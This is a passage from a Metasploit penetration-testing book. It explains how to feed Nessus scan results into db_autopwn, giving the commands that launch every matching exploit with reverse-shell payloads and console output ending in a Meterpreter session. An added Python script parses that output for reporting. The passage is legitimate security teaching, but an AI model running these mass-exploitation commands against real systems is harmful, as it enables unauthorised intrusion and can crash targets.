
Chapter 4

The xspy tool remotely sniffs the X server's keyboard session and has captured a user running SSH to log in as root on a remote system. Vulnerabilities such as this can be rare, but when you find them they are extremely valuable.

Using Scan Results for Autopwning

Let’s take a quick diversion into exploitation. Metasploit’s Autopwn tool auto-
matically targets and exploits a system using an open port or using the results 
of a vulnerability scan export. You can use Autopwn to harness the results of 
most vulnerability scanners, including NeXpose, Nessus, and OpenVAS.

For example, here's how we could use a Nessus results import to target a system and autopwn it. Create a new database with db_connect and use db_import to import the scan report. In the next example, we run db_autopwn with a series of switches to launch attacks against all targets (-e), show all matching modules (-t), use a reverse shell payload (-r), select exploit modules based on vulnerability (-x), and also select based on open ports (-p). Once db_autopwn launches, Metasploit begins launching exploits at the targets. Successful exploits return a shell to the attacking machine.

msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /root/nessus.nbe
msf > db_autopwn -e -t -r -x -p
[*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin against 192.168.33.130:1433...
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.33.130:445...
. . . SNIP . . .
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)
[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...

Based on these scans, Autopwn launched 72 exploits, and one was successful, as shown by the Meterpreter session that opened. This exploit allows us full access to the machine with a Meterpreter console, which will be discussed in far more depth in Chapter 6.
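When writing up an engagement, the console output above is the record of what was thrown at which host. The following Python is an added example (not from the book and not part of Metasploit) that parses db_autopwn console output into launched modules per target host and port plus the sessions that opened; the sample it parses is constructed from the transcript above.

```python
import re
from collections import defaultdict
# Constructed sample, modelled on the db_autopwn transcript above (not a real capture).
SAMPLE_OUTPUT = """\
[*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin against 192.168.33.130:1433...
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.33.130:445...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)
[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...
"""
# "[*] (n/total [k sessions]): Launching <module> against <host>:<port>..."
LAUNCH_RE = re.compile(
    r"^\[\*\] \((?P<idx>\d+)/(?P<total>\d+) \[(?P<sessions>\d+) sessions\]\): "
    r"Launching (?P<module>\S+) against (?P<host>[\d.]+):(?P<port>\d+)\.\.\.$"
)
# "[*] <Type> session <id> opened (<attacker ip:port> -> <target ip:port>)"
SESSION_RE = re.compile(
    r"^\[\*\] (?P<kind>\w+) session (?P<sid>\d+) opened "
    r"\((?P<src>[\d.]+:\d+) -> (?P<dst>[\d.]+:\d+)\)$"
)

def summarize_autopwn(output):
    """Group launched modules by target host/port and collect opened sessions."""
    targets = defaultdict(lambda: defaultdict(list))
    summary = {"total": 0, "launched": 0, "sessions": []}
    for line in output.splitlines():
        m = LAUNCH_RE.match(line)
        if m:
            summary["total"] = int(m.group("total"))  # the "/72" part of the counter
            summary["launched"] += 1                   # launch lines actually present
            targets[m.group("host")][int(m.group("port"))].append(m.group("module"))
            continue
        m = SESSION_RE.match(line)
        if m:
            summary["sessions"].append({"type": m.group("kind"), "id": int(m.group("sid")),
                                        "src": m.group("src"), "dst": m.group("dst")})
    summary["targets"] = {host: dict(ports) for host, ports in targets.items()}
    return summary

if __name__ == "__main__":
    s = summarize_autopwn(SAMPLE_OUTPUT)
    for host, ports in s["targets"].items():
        for port, mods in ports.items():
            print(f"{host}:{port} <- {len(mods)} module(s): {', '.join(mods)}")
    for sess in s["sessions"]:
        print(f"{sess['type']} session {sess['id']} opened on {sess['dst']}")
```

Because the book's transcript is cut with SNIP, only three of the 72 launch lines are present in the sample, so the "launched" count reports lines seen rather than the counter's total.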

NOTE

One big caveat to remember when using Autopwn: If you're going in with your Autopwn guns blazing, the target system can crash or lose stability. Autopwn has useful features not covered here, such as the ability to select only exploits that have an "Excellent" ranking, meaning it is very unlikely they will crash the remote system or service. For more information on its usage, enter db_autopwn -h.